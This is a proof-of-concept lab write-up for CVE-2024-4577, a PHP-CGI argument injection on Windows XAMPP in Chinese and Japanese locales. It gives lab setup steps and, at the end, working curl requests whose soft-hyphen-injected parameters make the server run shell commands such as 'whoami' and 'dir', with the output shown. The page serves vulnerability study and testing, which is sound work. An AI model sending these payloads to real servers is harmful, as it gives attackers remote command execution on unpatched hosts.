# CVE-2024-4577

CVE-2024-4577 is a PHP CGI <mark style="color:red;">Argument Injection Vulnerability</mark> discovered by [DEVCORE](https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/). The vulnerability has been verified on **Windows machines** running in the <mark style="color:red;">**following locales**</mark>:

* Traditional Chinese (Code Page 950)
* Simplified Chinese (Code Page 936)
* Japanese (Code Page 932)

All versions of XAMPP on Windows are vulnerable by default. Following PHP versions are affected on the **Windows operating system**:

* PHP 8.3 < 8.3.8
* PHP 8.2 < 8.2.20
* PHP 8.1 < 8.1.29

***

### How to setup your own PoC environment

1. On your Windows machine download and install [XAMPP](https://www.apachefriends.org/).&#x20;
2. Download [mod\_fcgid.so](https://www.apachelounge.com/download/) and paste it in `C:\xampp\apache\modules`
3. Verify that the below code is <mark style="color:red;">**not commented**</mark> in `C:\xampp\apache\conf\extra\httpd-xampp.conf`

```php
#
# PHP-CGI setup
#
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>
<IfModule actions_module>
    Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"
</IfModule>
```

4. Start the Apache / PHP using XAMPP Control Panel and verify that `CGI/FastCGI` is running.

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FoRSST7wk2k8o8CAqAGRh%2Fimage.png?alt=media&#x26;token=22c9500f-accb-47f9-b5ba-4a66ce2636cc" alt=""><figcaption></figcaption></figure>

5. Change system locale to either of the three listed locales above, and reboot the host. This will not change the Windows display language.\
   \&#xNAN;*Control Panel > Clock and Region > Region > Administrative > Change system locale...*
6. Once rebooted start the webserver again and attack the target from any host.

```bash
dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "whoami"'); ?>"
desktop-n7r8uh6\void

dev :: ~ » curl -s -X POST "http://192.168.101.213/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" -H "Content-Type: application/x-www-form-urlencoded" --data "<?php system('cmd /c "dir"'); ?>"
 Volume in drive C has no label.
 Volume Serial Number is 0AE3-44EE

 Directory of C:\xampp\htdocs

2024-08-14  12:25    <DIR>          .
2024-08-14  10:45    <DIR>          ..
2022-06-15  18:07             3?607 applications.html
2022-06-15  18:07               177 bitnami.css
2024-08-14  10:18    <DIR>          dashboard
2015-07-16  17:32            30?894 favicon.ico
2024-08-14  10:18    <DIR>          img
2015-07-16  17:32               260 index.php
2024-08-14  10:17    <DIR>          webalizer
2024-08-14  10:18    <DIR>          xampp
               4 File(s)         34?938 bytes
               6 Dir(s)  28?033?204?224 bytes free

```